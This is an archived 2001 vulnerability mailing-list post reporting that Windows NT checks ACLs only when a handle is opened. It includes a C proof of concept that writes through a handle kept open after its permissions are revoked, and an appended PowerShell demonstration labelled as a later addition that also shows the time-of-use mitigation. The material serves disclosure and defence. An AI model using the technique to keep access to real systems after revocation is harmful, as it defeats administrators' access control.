Vulnerability Development mailing list archives

Windows NT does not check permissions after HANDLEs are open


From: c0ncept () hushmail com
Date: Wed, 29 Aug 2001 16:00:26 -0700


   Sorry for the cross-post; I thought this would be relevant to both communities.

   The component of the NT executive responsible for enforcing ACLs and DACLs is known as the Security Reference 
Monitor. When a kernel resource is requested, the requesting program specifies the type of access it desires. The SRM 
checks against the access list, and grants the requestor a HANDLE to the object if the requestor has appropriate rights.
    The check against the ACL only occurs when the HANDLE is first opened, however. If a HANDLE is opened and 
permissions on the object subsequently change, the original requestor of the object retains the original 
access permissions. Therefore, it is possible to retain access to an object after the Creator/Owner or an administrator 
has changed the ACL simply by maintaining an open handle. If the requestor is a service or server program that is 
expected to run 24/7, the object will remain accessible long after the ACL has been altered [think ISAPI, extended stored 
procedures, et al].


  -- c0ncept

  O/T: I own a Honda, and have been told by every mechanic that has looked at it that it is the easiest car to break 
into [the AAA guy was nice enough to demonstrate]. I hear newer Hondas are even easier.

proof of concept:
  1.) create a file named "test.txt". Make it writeable to the current user
  2.) compile and run the included C code
  3.) when the program prompts you to change the ACL, uncheck
      Allow Inheritable Permissions to Propagate and remove all
      entries from the ACE. Press <return> at the prompt.
  4.) Take ownership of the file and open it. Notice that although the
      ACL had already been modified, the write succeeded.

[-- cut code here --]
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define FILE_NAME       "test.txt"
#define MESSAGE         "Test"
#define MSG_LEN         4

int main(int argc, char** argv)
{
        HANDLE fileHandle;
        DWORD written;

        /* The access check against the file's DACL happens here, at open time. */
        fileHandle = CreateFile(FILE_NAME, GENERIC_WRITE,
                FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if(fileHandle == INVALID_HANDLE_VALUE){
                /* Win32 API failures are reported through GetLastError(), not errno. */
                fprintf(stderr, "CreateFile failed: error %lu\n", GetLastError());
                exit(1);
        }
        printf("Change the file's ACLs and press enter.");
        fflush(stdout);
        getchar();
        /* No second check is made: the write goes through on the already-open handle. */
        if(!WriteFile(fileHandle, MESSAGE, MSG_LEN, &written, NULL))
                fprintf(stderr, "WriteFile failed: error %lu\n", GetLastError());
        else
                printf("Wrote %lu bytes through the original handle.\n", written);
        CloseHandle(fileHandle);

        return 0;
}
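The same experiment scripted from an administrator's side, as an added example that is not part of the original post: it contrasts a cached handle with an open performed at time of use, which is the mitigation a long-running service should apply. It assumes a scratch file under $env:TEMP owned by the current user, so that user can rewrite its DACL.

```powershell
# Added example (not from the original post). Assumes a scratch file under
# $env:TEMP owned by the current user, who can therefore modify its DACL.
$path = Join-Path $env:TEMP 'handle-acl-demo.txt'
Set-Content -Path $path -Value 'initial'

# 1. Open a write handle while the DACL still allows it. This plays the role
#    of the long-running service that caches a handle.
$stale = [System.IO.File]::Open($path, 'Open', 'Write', 'ReadWrite')

# 2. Tighten the DACL: disable inheritance, drop every inherited ACE, and
#    grant the current user read access only.
$me  = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$acl = Get-Acl -Path $path
$acl.SetAccessRuleProtection($true, $false)
foreach ($rule in @($acl.Access)) { [void]$acl.RemoveAccessRule($rule) }
$acl.AddAccessRule([System.Security.AccessControl.FileSystemAccessRule]::new(
    $me, 'Read', 'Allow'))
Set-Acl -Path $path -AclObject $acl

# 3. The cached handle is not re-checked against the new DACL: the write succeeds.
$bytes = [System.Text.Encoding]::ASCII.GetBytes('written through the cached handle')
$stale.Write($bytes, 0, $bytes.Length)
$stale.Dispose()

# 4. The mitigation: open at time of use. This open is checked against the
#    current DACL and is refused.
try {
    $fresh = [System.IO.File]::Open($path, 'Open', 'Write', 'ReadWrite')
    $fresh.Dispose()
    Write-Output 'unexpected: fresh write handle was granted'
} catch [System.UnauthorizedAccessException] {
    Write-Output "fresh write open denied, as expected: $($_.Exception.Message)"
}
```

Step 3 is the behaviour the post describes; step 4 is what a service gets by re-opening the object for each sensitive operation instead of holding a handle for its lifetime.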
